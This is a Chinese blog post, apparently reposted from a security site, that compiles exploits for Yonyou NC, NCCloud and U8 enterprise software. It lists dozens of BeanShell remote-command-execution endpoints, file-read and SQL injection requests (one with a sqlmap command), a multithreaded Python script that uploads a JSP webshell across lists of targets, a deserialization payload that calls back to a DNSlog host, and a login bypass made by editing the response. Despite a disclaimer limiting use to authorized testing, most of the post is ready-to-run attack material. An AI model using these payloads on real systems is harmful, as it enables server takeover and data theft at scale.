用友OA/NC/NCCloud漏洞集合

已于 2022-08-16 22:45:43 修改
阅读量7.9k 收藏 9
点赞数
文章标签: servlet
于 2022-08-16 22:44:24 首次发布
原文链接:http://cn-sec.com/archives/1198979.html
版权

目录

0x01声明    

0x02漏洞集合

web.xml

prop.xml(数据库配置)

任意文件读取

bsh.servlet.BshServlet 远程命令执行漏洞 

用友 NCCloud FS 文件管理 SQL 注入

用友 NC 6.5 未授权文件上传漏洞

用友 NC XbrlPersistenceServlet 反序列化

用友 U8 OASQL注入漏洞

xxe漏洞 

接口信息泄露

控制台密码绕过 

0x01声明    

        以下用友漏洞集合仅用于学习与讨论,提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

        只供对已授权的目标使用测试,对未授权目标的测试作者不承担责任,均由使用本人自行承担。

0x02漏洞集合

web.xml

/webapps/nc_web/WEB-INF/web.xml

<servlet-mapping>

 <servlet-name>NCInvokerServlet</servlet-name>

 <url-pattern>/service/*</url-pattern>

</servlet-mapping>



<servlet-mapping>

 <servlet-name>NCInvokerServlet</servlet-name>

 <url-pattern>/servlet/*</url-pattern>

</servlet-mapping>

prop.xml(数据库配置)

/ierp/bin/prop.xml

<dataSource>

<dataSourceName>nc</dataSourceName>

<oidMark>C2</oidMark> <databaseUrl>jdbc:sqlserver://127.0.0.1:1433;database=nc;sendStringParametersAsUnicode=false</databaseUrl>

<user>nc</user>

<password>jlehfdffcfmohiag</password> <driverClassName>com.microsoft.sqlserver.jdbc.SQLServerDriver</driverClassName> <databaseType>SQLSERVER</databaseType>

<maxCon>50</maxCon>

<minCon>10</minCon> <dataSourceClassName>nc.bs.mw.ejb.xares.IerpDataSource</dataSourceClassName> <xaDataSourceClassName>nc.bs.mw.ejb.xares.IerpXADataSource</xaDataSourceClassName> <conIncrement>0</conIncrement>

<conInUse>0</conInUse>

<conIdle>0</conIdle>

</dataSource>

任意文件读取

     filename参数可以读取下列所有文件,在某些情况下可以读取利用目录穿越可读取/etc/passwd等文件

http://x.x.x.x/NCFindWeb?service=IPreAlertConfigService&filename=/

bsh.servlet.BshServlet 远程命令执行漏洞 

        用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,通过 BeanShell 执行远程命令获取服务器权限。

poc

http://x.x.x.x/service/~aim/bsh.servlet.BshServlet http://x.x.x.x/service/~alm/bsh.servlet.BshServlet http://x.x.x.x/service/~ampub/bsh.servlet.BshServlet http://x.x.x.x/service/~arap/bsh.servlet.BshServlet http://x.x.x.x/service/~aum/bsh.servlet.BshServlet http://x.x.x.x/service/~cc/bsh.servlet.BshServlet http://x.x.x.x/service/~cdm/bsh.servlet.BshServlet http://x.x.x.x/service/~cmp/bsh.servlet.BshServlet http://x.x.x.x/service/~ct/bsh.servlet.BshServlet http://x.x.x.x/service/~dm/bsh.servlet.BshServlet http://x.x.x.x/service/~erm/bsh.servlet.BshServlet http://x.x.x.x/service/~fa/bsh.servlet.BshServlet http://x.x.x.x/service/~fac/bsh.servlet.BshServlet http://x.x.x.x/service/~fbm/bsh.servlet.BshServlet http://x.x.x.x/service/~ff/bsh.servlet.BshServlet http://x.x.x.x/service/~fip/bsh.servlet.BshServlet http://x.x.x.x/service/~fipub/bsh.servlet.BshServlet http://x.x.x.x/service/~fp/bsh.servlet.BshServlet http://x.x.x.x/service/~fts/bsh.servlet.BshServlet http://x.x.x.x/service/~fvm/bsh.servlet.BshServlet http://x.x.x.x/service/~gl/bsh.servlet.BshServlet http://x.x.x.x/service/~hrhi/bsh.servlet.BshServlet http://x.x.x.x/service/~hrjf/bsh.servlet.BshServlet http://x.x.x.x/service/~hrpd/bsh.servlet.BshServlet http://x.x.x.x/service/~hrpub/bsh.servlet.BshServlet http://x.x.x.x/service/~hrtrn/bsh.servlet.BshServlet http://x.x.x.x/service/~hrwa/bsh.servlet.BshServlet http://x.x.x.x/service/~ia/bsh.servlet.BshServlet http://x.x.x.x/service/~ic/bsh.servlet.BshServlet http://x.x.x.x/service/~iufo/bsh.servlet.BshServlet http://x.x.x.x/service/~modules/bsh.servlet.BshServlet http://x.x.x.x/service/~mpp/bsh.servlet.BshServlet http://x.x.x.x/service/~obm/bsh.servlet.BshServlet http://x.x.x.x/service/~pu/bsh.servlet.BshServlet http://x.x.x.x/service/~qc/bsh.servlet.BshServlet http://x.x.x.x/service/~sc/bsh.servlet.BshServlet http://x.x.x.x/service/~scmpub/bsh.servlet.BshServlet http://x.x.x.x/service/~so/bsh.servlet.BshServlet http://x.x.x.x/service/~so2/bsh.servlet.BshServlet http://x.x.x.x/service/~so3/bsh.servlet.BshServlet http://x.x.x.x/service/~so4/bsh.servlet.BshServlet http://x.x.x.x/service/~so5/bsh.servlet.BshServlet http://x.x.x.x/service/~so6/bsh.servlet.BshServlet http://x.x.x.x/service/~tam/bsh.servlet.BshServlet http://x.x.x.x/service/~tbb/bsh.servlet.BshServlet http://x.x.x.x/service/~to/bsh.servlet.BshServlet http://x.x.x.x/service/~uap/bsh.servlet.BshServlet http://x.x.x.x/service/~uapbd/bsh.servlet.BshServlet http://x.x.x.x/service/~uapde/bsh.servlet.BshServlet http://x.x.x.x/service/~uapeai/bsh.servlet.BshServlet http://x.x.x.x/service/~uapother/bsh.servlet.BshServlet http://x.x.x.x/service/~uapqe/bsh.servlet.BshServlet http://x.x.x.x/service/~uapweb/bsh.servlet.BshServlet http://x.x.x.x/service/~uapws/bsh.servlet.BshServlet http://x.x.x.x/service/~vrm/bsh.servlet.BshServlet http://x.x.x.x/service/~yer/bsh.servlet.BshServlet

用友 NCCloud FS 文件管理 SQL 注入

用友 NCCloud FS 文件管理登录页面对用户名参数没有过滤,存在 SQL 注入

/platform/yonyou-yyy.js

http://x.x.x.x/fs/

username参数存在注入,抓取登录数据包:

GET /fs/console?username=1&password=00PGRLxSTe3VroI21qJNymCrZfPX1UQ4ij0gIWn2Gc4%3D HTTP/1.1
 Host: x.x.x.x
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
 Accept-Encoding: gzip, deflate
 Connection: close
 Referer: http://x.x.x.x/fs/
 Cookie: JSESSIONID=FFAE8EF48BD3BEF7E94B5449B8F9BA90.server
 Upgrade-Insecure-Requests: 1

使用sqlmap跑  sqlmap -r text.txt -p username

用友 NC 6.5 未授权文件上传漏洞

        用友 NC6.5 版本存在未授权文件上传漏洞,攻击者可以未授权上传任意文件,进而获取服务端控制权限。

/platform/yonyou-yyy.js

POC

import requests
 import threadpool
 import urllib3
 import sys
 import argparse
 
 urllib3.disable_warnings()
 proxies = {'http': 'http://localhost:8080', 'https': 'http://localhost:8080'}
 header = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
    "Content-Type": "application/x-www-form-urlencoded",
    "Referer": "https://google.com",
 }
 
 def multithreading(funcname, filename="url.txt", pools=5):
    works = []
    with open(filename, "r") as f:
        for i in f:
            func_params = [i.rstrip("\n")]
            works.append((func_params, None))
    pool = threadpool.ThreadPool(pools)
    reqs = threadpool.makeRequests(funcname, works)
    [pool.putRequest(req) for req in reqs]
    pool.wait()
 
 def wirte_targets(vurl, filename):
    with open(filename, "a+") as f:
        f.write(vurl + "\n")
        return vurl
     
 def exp(u):
    uploadHeader = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
        "Content-Type": "multipart/form-data;",
        "Referer": "https://google.com"
    }
    uploadData = "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x02\x74\x00\x09\x46\x49\x4c\x45\x5f\x4e\x41\x4d\x45\x74\x00\x09\x74\x30\x30\x6c\x73\x2e\x6a\x73\x70\x74\x00\x10\x54\x41\x52\x47\x45\x54\x5f\x46\x49\x4c\x45\x5f\x50\x41\x54\x48\x74\x00\x10\x2e\x2f\x77\x65\x62\x61\x70\x70\x73\x2f\x6e\x63\x5f\x77\x65\x62\x78"
    shellFlag="t0test0ls"
    uploadData+=shellFlag
    try:
        req1 = requests.post(u + "/servlet/FileReceiveServlet", headers=uploadHeader, verify=False, data=uploadData, timeout=25)
        if req1.status_code == 200 :
            req3=requests.get(u+"/t00ls.jsp",headers=header, verify=False, timeout=25)
 
            if req3.text.index(shellFlag)>=0:
                printFlag = "[Getshell]" + u+"/t00ls.jsp" + "\n"
                print (printFlag)
                wirte_targets(printFlag, "vuln.txt")
    except :
        pass
    #print(printFlag, end="")
 
 
 if __name__ == "__main__":
    if (len(sys.argv)) < 2:
        print('useage : python' +str(sys.argv[0]) + ' -h')
    else:
        parser =argparse.ArgumentParser()
        parser.description ='YONYOU UC 6.5 FILE UPLOAD!'
        parser.add_argument('-u',help="url -> example 
http://127.0.0.1
",type=str,dest='check_url')
        parser.add_argument('-r',help="url list to file",type=str,dest='check_file')
        args =parser.parse_args()
        if args.check_url:
            exp(args.check_url)
         
        if(args.check_file):
            multithreading(exp, args.check_file, 8)

用友 NC XbrlPersistenceServlet 反序列化

/service/~xbrl/XbrlPersistenceServlet

POC

import requests
 import threadpool
 import urllib3
 import sys
 import base64
 
 ip = "x.x.x.x"
 dnslog = "*****" #dnslog把字符串转16进制替换该段,测试用的ceye.io可以回显
 data = "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x73\x72\x00\x0c\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x55\x52\x4c\x96\x25\x37\x36\x1a\xfc\xe4\x72\x03\x00\x07\x49\x00\x08\x68\x61\x73\x68\x43\x6f\x64\x65\x49\x00\x04\x70\x6f\x72\x74\x4c\x00\x09\x61\x75\x74\x68\x6f\x72\x69\x74\x79\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x04\x66\x69\x6c\x65\x71\x00\x7e\x00\x03\x4c\x00\x04\x68\x6f\x73\x74\x71\x00\x7e\x00\x03\x4c\x00\x08\x70\x72\x6f\x74\x6f\x63\x6f\x6c\x71\x00\x7e\x00\x03\x4c\x00\x03\x72\x65\x66\x71\x00\x7e\x00\x03\x78\x70\xff\xff\xff\xff\x00\x00\x00\x50\x74\x00\x11"+dnslog+"\x3a\x38\x30\x74\x00\x00\x74\x00\x0e"+dnslog+"\x74\x00\x04\x68\x74\x74\x70\x70\x78\x74\x00\x18\x68\x74\x74\x70\x3a\x2f\x2f"+dnslog+"\x3a\x38\x30\x78"
 
 uploadHeader={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"}
 req = requests.post("http://+"ip"+/service/~xbrl/XbrlPersistenceServlet", headers=uploadHeader, verify=False, data=data, timeout=25)
 print (req.text)

用友 U8 OASQL注入漏洞

/yyoa/seeyonoa/common/

POC

/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))

xxe漏洞 

/uapws/service/nc.uap.oba.update.IUpdateService?wsdl

接口信息泄露

/uapws/service

控制台密码绕过 

/uapws/index.jsp

账户密码随便填,抓包将返回包0改为1,即可任意用户登录

ElvisElvis6
关注
  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC6.5的某个页面,存在任意文件上传漏洞漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击者可在目标系统上传任意文件执行命令。
NC65配置WSDL文件生成工具.rar
03-25
NC65版本uapstudio安装wsdl文件生成工具插件
【复现】用友NC-Cloud文件上传漏洞_70
最新发布
fushuang333的博客
04-10 477
【复现】用友NC-Cloud文件上传漏洞,上传文件漏洞的影响可能会非常严重,上传可执行代码可能让攻击者获得服务器控制权。
漏洞复现】---- AppWeb认证绕过漏洞(CVE-2018-8715)
qq_43168364的博客
09-06 299
一、简介 AppWeb是老外的公司负责开发维护的一个基于GPL开源协议(Linux就使用了GPL开源协议)的Web Server。他使用C/C++来编写,能够运行在几乎所有操作系统上。他最主要的应用场景还是为嵌入式设备提供web application容器。 AppWeb可以进行认证配置,其认证方式包括以下三种: basic传统HTTP基础认证 digest改进版HTTP基础认证,认证成功后将使用Cookie来保存状态,而不用传统的Authorization头 form表单认证 其7.0.3之前的版
用友NC-Cloud INtbOBAWebService xxe漏洞
weixin_52204925的博客
02-28 750
该系统/uapws/service/nc.itf.tb.oba.INtbOBAWebService接口存在XXE漏洞,恶意攻击者可能会利用该命令在xml中构造恶意命令,可能会导致服务器失陷或者敏感信息泄露。
用友-NC-Cloud远程代码执行漏洞(你懂的)
weixin_43689708的博客
07-22 875
用友NC Cloud大型企业数字化平台,深度应用新一代数字智能技术,完全基于云原生架构,打造开放、互联、融合、智能的一体化云平台,聚焦数智化管理、数智化经营、数智化商业等三大企业数智化转型战略方向,提供涵盖数字营销、财务共享、全球司库、智能制造、敏捷供应链、人才管理、智慧协同等18大解决方案,帮助大型企业全面落地数智化。
用友NC uapjs RCE漏洞复现(CNVD-C-2023-76801)
0xSec
06-29 9568
用友NCNC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器
用友OA U8 test.jsp sql注入漏洞复现
qq_44828901的博客
06-21 1450
简单验证、复现漏洞
用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
Adminxe的博客
07-02 5054
0x00 漏洞描述 用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限 看到这个beanshell,就会想起来一个洞,是泛微OA的beanshell 0x01 漏洞影响 用友 NC 0x02 FOFA “用友网络” 0x03 漏洞复现 漏洞位置 /servlet/~ic/bsh.servlet.BshServlet 将POC修改为: exec(“whoami”) 0x04 利用总..
0day用友-NC-Cloud远程代码执行漏洞(全版本通杀)
失心少年
07-31 761
用友NC Cloud大型企业数字化平台,深度应用新一代数字智能技术,完全基于云原生架构,打造开放、互联、融合、智能的一体化云平台,聚焦数智化管理、数智化经营、数智化商业等三大企业数智化转型战略方向,提供涵盖数字营销、财务共享、全球司库、智能制造、敏捷供应链、人才管理、智慧协同等18大解决方案,帮助大型企业全面落地数智化。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!FOFA:app=“用友-NC-Cloud
用友-NC-Cloud远程代码执行漏洞[2023-HW]
holyxp的博客
08-13 1517
漏洞是通过请求特定的接口,然后调用"nc.itf.iufo.IBaseSPService"服务中的"saveXStreamConfig"方法进行请求;直接往webapps/nc_web/目录写马。最后访问刚才写的马,调用 Runtime.getRuntime().exec(“command”) 来执行系统命令,并通过getInputStream()获取该命令的输出流;然后IOUtils.toString() 方法将输出流转换为字符串。
用友NC65/NCC自由报表视频合并大全
04-11
里面是自由报表得各种视频,教你手把手做报表,如交叉表,报表穿透,报表联查,报表订阅,报表如何使用查询模板,语义模型里的数据加工,元定义,语义脚本如何使用等
NC Cloud技术文档及OpenAPI案例文档
03-09
NC Cloud技术文档及OpenAPI案例文档
用友NC5X账套解码工具
03-30
NC5X账套解码工具
用友NCC NC bip二开idea开发插件
04-14
用友NCC NC bip二开idea开发插件
漏洞复现】用友NC-Cloud soapFormat XXE漏洞
m0_71285176的博客
01-12 548
用友NC-Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现人、财、物、客的 全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。该系统/uapws/soapFormat.ajax接口存在XXE漏洞,攻击者可以在xml中构造恶意命令,会导致服务器被远控。
漏洞复现--用友U8-Cloud upload.jsp任意文件上传
qq_53003652的博客
10-26 520
U8 cloud集中于企业内部管理管控,管理规范,高效,协同,透明。通过云模式,低成本,快速部署,即租即用帮助企业免除硬软件投入的快速 搭建企业管理架构。通过云服务连接,业务模式、服务模式的经营创新。该产品upload.jsp存在任意文件上传漏洞。上传路径在/linux/{filename}.jsp。此处为国外网站资产,请勿非法利用!上传免杀马直接getshell。用友U8-Cloud
NC发布与调用WebService接口
sqc1986的博客
11-10 221
1.2.接口实现 1.3.请求DTO 1.4 工程结构 注意:wsdl标签和address标签中尽量配置成与接口的全限定名一样,否则请求时请求不到接口(必须这么写) 2.3启动参数中添加uapws 2.4 检查ws文件是否生成 启动工程,查看 nchome/temp/wsgen/ 目录下是否生成了 wsdl 文件 2.通过生成的代码调用WebService接口,将生成的代码复制到工程中 4.运行结果
用友U8 Cloud soapFormat XXE漏洞复现
0xSec
12-27 737
用友U8 Cloud soapFormat.ajax接口处存在 XXE漏洞,攻击者可通过该漏洞获取敏感文件信息,攻击者添加恶意内容,通过易受攻击的代码,就能够攻击包含缺陷的XML处理器。
用友nc portal/file
01-26
用友NC Portal/File是用友集团针对企业管理需求推出的一套云端平台和文件管理系统。通过使用该系统,企业可以实现多种功能,包括企业门户、文件管理与协作、信息发布与交流等。 首先,用友NC Portal提供了一个企业门户,通过该门户,员工可以方便地获取企业内部的各种信息和服务。员工可以登录系统,查看个人的工作任务、日程安排、考勤记录等,同时还可以浏览公司公告、文档库、内部新闻等企业发布的信息。 其次,用友NC File是一个文件管理与协作的平台。企业可以将各类文件上传至系统中进行存储和管理,包括办公文档、图纸、合同等。该系统支持多人协同编辑和共享文件,有效地提高了团队协作的效率。同时,系统还提供文件版本管理功能,可以追踪文件的修改历史,方便查看和比较不同版本的文件内容。 此外,用友NC Portal/File还具备信息发布与交流的功能。企业可以通过系统发布公司公告、通知等消息,方便员工了解企业最新动态。此外,系统还支持员工之间的留言和讨论,员工可以在系统中进行信息交流和合作,提升团队沟通效率。 总的来说,用友NC Portal/File是一款功能强大的云端平台和文件管理系统。它帮助企业实现了企业门户、文件管理与协作、信息发布与交流的多种功能,提高了企业的管理效率和团队的协作效能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值